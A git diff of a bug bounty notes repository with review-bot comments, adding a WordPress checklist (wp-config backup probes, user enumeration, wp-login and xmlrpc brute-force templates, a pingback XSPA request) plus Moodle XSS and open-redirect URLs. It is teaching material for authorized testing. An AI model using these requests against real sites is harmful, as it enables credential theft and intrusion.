@@ -27,14 +28,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md) - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md) - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md) -- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md) - -## List CMS -- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md) - -## List Framework -- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md) -- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md) +- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) ## Miscellaneous - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md) @@ -52,7 +46,10 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) +- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md) - [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md) +- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md) +- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md) ## Reconnaissance - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md) 
diff --git a/Recon/Scope.md b/Recon/Scope.md index 74b47d8..f030592 100644 --- a/Recon/Scope.md +++ b/Recon/Scope.md @@ -11,6 +11,7 @@ Only Specific URLs are part of Scope. This usually includes staging/dev/testing - [x] Broken Link Hijacking - [x] Data Breach Analysis - [x] Misconfigured Cloud Storage + * ### __Medium Scope__ Usually the scope is wild card scope where all the subdomains are part of scope - [x] Subdomain Enumeration @@ -33,6 +34,7 @@ Usually the scope is wild card scope where all the subdomains are part of scope - [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc. - [x] Heartbleed Scanning - [x] General Security Misconfiguration Scanning + * ### __Large Scope__ Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization. - [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​ diff --git a/Recon/Shodan Dorks.md b/Recon/Shodan Dorks.md index 5b14648..07e69fd 100644 --- a/Recon/Shodan Dorks.md +++ b/Recon/Shodan Dorks.md @@ -549,7 +549,7 @@ http.title:"- Polycom" "Server: lighttpd" ### Intel Active Management CVE-2017-5689 ``` "Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 -”Active Management Technology” +"Active Management Technology" ``` ### HP iLO 4 CVE-2017-12542 diff --git a/Framework/laravel.md b/Technologies/Laravel.md similarity index 100% rename from Framework/laravel.md rename to Technologies/Laravel.md diff --git a/Technologies/Moodle.md b/Technologies/Moodle.md index bb4a6d1..bcd6c50 100644 --- a/Technologies/Moodle.md +++ b/Technologies/Moodle.md 
@@ -1,11 +1,11 @@ # Moodle -1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter +1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter ``` https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1) ``` -2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter +2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter ``` https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com diff --git a/Technologies/WordPress.md b/Technologies/WordPress.md new file mode 100644 index 0000000..84069bb --- /dev/null +++ b/Technologies/WordPress.md 
@@ -0,0 +1,101 @@ +# WordPress Common Bugs + +## Introduction +What would you do if you came across a website that uses WordPress? + +1. Find the related CVE by checking the core, plugins, and theme version +* How to find the wordpress version +``` +https://target.com/feed +https://target.com/?feed=rss2 +``` + +* How to find the plugin version +``` +https://target.com/wp-content/plugins/PLUGINNAME/readme.txt +https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT +https://target.com/wp-content/plugins/PLUGINNAME/README.txt +https://target.com/wp-content/plugins/PLUGINNAME/README.TXT +``` + +> or change readme.txt to changelog.txt or readme.md + +* How to find the theme version +``` +https://target.com/wp-content/themes/THEMENAME/style.css +https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file) +``` +If you found outdated core / plugins / themes, find the exploit at https://wpscan.com + +2. Finding log files +``` +http://target.com/wp-content/debug.log +``` + +3. Finding backup file wp-config +``` +http://target.com/.wp-config.php.swp +http://target.com/wp-config.inc +http://target.com/wp-config.old +http://target.com/wp-config.txt +http://target.com/wp-config.html +http://target.com/wp-config.php.bak +http://target.com/wp-config.php.dist +http://target.com/wp-config.php.inc +http://target.com/wp-config.php.old +http://target.com/wp-config.php.save +http://target.com/wp-config.php.swp +http://target.com/wp-config.php.txt +http://target.com/wp-config.php.zip +http://target.com/wp-config.php.html +http://target.com/wp-config.php~ +``` + +4. Get the username on the website +``` +http://target.com/?author=1 +``` +or +``` +http://target.com/wp-json/wp/v2/users +http://target.com/?rest_route=/wp/v2/users +``` + +5. 
Bruteforce +``` +POST /wp-login.php HTTP/1.1 +Host: target.com + +log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1 +``` +or +``` +POST /xmlrpc.php HTTP/1.1 +Host: target.com + + + +wp.getUsersBlogs + +admin +BRUTEFORCE_IN_HERE + + +``` + +6. XSPA in wordpress +``` +POST /xmlrpc.php HTTP/1.1 +Host: target.com + + +pingback.ping + +http://yourip:port + + +https://target.com> + + + +``` diff --git a/Technologies/Zend.md b/Technologies/Zend.md new file mode 100644 index 0000000..f0d0b5a --- /dev/null +++ b/Technologies/Zend.md @@ -0,0 +1,13 @@ +# Common bug in Zend framework + +## Introduction +What would you do if you came across a website that uses Zend? + +## How to Detect + + +1. Finding config files +``` +https://target.com/application/configs/application.ini +https://target.com/admin/configs/application.ini +``` \ No newline at end of file diff --git a/Web Cache Poisoning.md b/Web Cache Poisoning.md index 1ba7a47..da1ba97 100644 --- a/Web Cache Poisoning.md +++ b/Web Cache Poisoning.md @@ -1,8 +1,9 @@ # Web Cache Poisoning -## **Introduction** + +## Introduction The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. -## **How to Find** +## How to FInd 1. Basic poisoning ``` GET / HTTP/1.1 @@ -29,6 +30,7 @@ Cache-Control: public, no-cache … a.png" /> ``` + 2. Seizing the Cache ``` GET / HTTP/1.1 @@ -45,6 +47,7 @@ Cache-Control: public, max-age=1800 ``` + 3. Selective poisoning ``` GET / HTTP/1.1 @@ -60,6 +63,7 @@ Vary: User-Agent, Accept-Encoding … a
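Review bot: the deletion of Misc/Default Credentials.csv (2,561 lines in the diffstat) is a content removal, not a structure change, and the subject "Update structure each readme" does not mention it. Move it to its own commit or state the reason in the message, and confirm nothing in the README or the other notes still links to the file.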
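Review bot: in Misc/Email Spoofing.md the section heading becomes "How to detect", while the other files touched by this patch use "How to find" or "How to exploit"; use one of those here so the structure is uniform. The unchanged step 1 under that heading reads "if the website don't have a SPF record" and should read "doesn't have an SPF record".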
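Review bot: in Misc/Exposed API keys.md the new "# References" line is a level-1 heading, so it renders as a second page title beside "# Exposed API Keys / Token OAuth"; it should be "## References" like "## Introduction", "## How to find" and "## Tools" in the same hunk. The two reference bullets also need a grammar pass ("There is 79 list of how to check", "The repository contain description API key"), and the title says "Token OAuth" where the bullet says "Oauth tokens".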
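Review bot: in Misc/JWT Vulnerabilities.md the added heading is "## Reference" (singular) and its entry keeps the "- " bullet, whereas every other file in this patch uses "## References" with "* " bullets. Rename the heading and switch the bullet so the section matches the structure the commit is introducing.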
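Review bot: in Misc/Password Reset Flaws.md, first hunk, the page title stays at "## Password Reset Flaws", so the new "## Introduction" and "## How to exploit" render as siblings of the title instead of sections under it. Promote the title to "# Password Reset Flaws", and end the one-line introduction with a period.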
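Review bot: in Misc/Password Reset Flaws.md, last hunk, the "[For Example]" link to the bugbountywriteup article is deleted from the token-generation step and does not reappear in the new References list. If the write-up is still the illustration for step 9, carry it over as a third reference instead of dropping it.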
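Review bot: in OAuth Misconfiguration.md, rewritten item 2 still says "Change Referral header"; the HTTP header is named Referer, so the step as written points at a header that does not exist. In the same hunk, item 1 is missing a space in "attacker.com(Use IDN Homograph", and item 11 should read "it's leaking".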
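Review bot: in Open Redirect.md, second hunk, the context line for item 17 calls `%0d` and `%0a` a "nullbyte", but those are the encoded carriage return and line feed; a null byte is `%00`. Since this hunk touches that block anyway, correct the wording to CR/LF and fix "yoou" in the same sentence.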
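Review bot: in Technologies/Moodle.md the rewritten items 1 and 2 name the parameter "redirect_url", while both example URLs under them use redirect_uri; one of the two is wrong and the text should match the request. The example for item 2 also uses a real hostname (classroom.its.ac.id) where item 1 uses the target.com placeholder; replace it with the placeholder.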
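Review bot: in the new Technologies/WordPress.md the whole six-item checklist sits under "## Introduction", with no "## How to find" or "## References" section, which is the structure this commit applies to the other files. Split the opening question from the checklist, indent the three "* How to find the ... version" bullets under item 1 so the numbering is not reset, and check the last value in item 6, which reads "https://target.com>" with a trailing ">".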
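Review bot: in the new Technologies/Zend.md the "## How to Detect" heading is followed by two empty added lines before item 1, and its casing differs from the "How to detect" used in Misc/Email Spoofing.md in this same patch. Drop the extra blank lines, align the heading text with whichever form the repository settles on, and end the file with a newline.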
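Review bot: in Web Cache Poisoning.md, first hunk, the replacement heading is "## How to FInd" with a capital I, which introduces a typo while removing the bold markers. It should read "## How to find", matching Business Logic Errors.md and Misc/Tabnabbing.md in this patch.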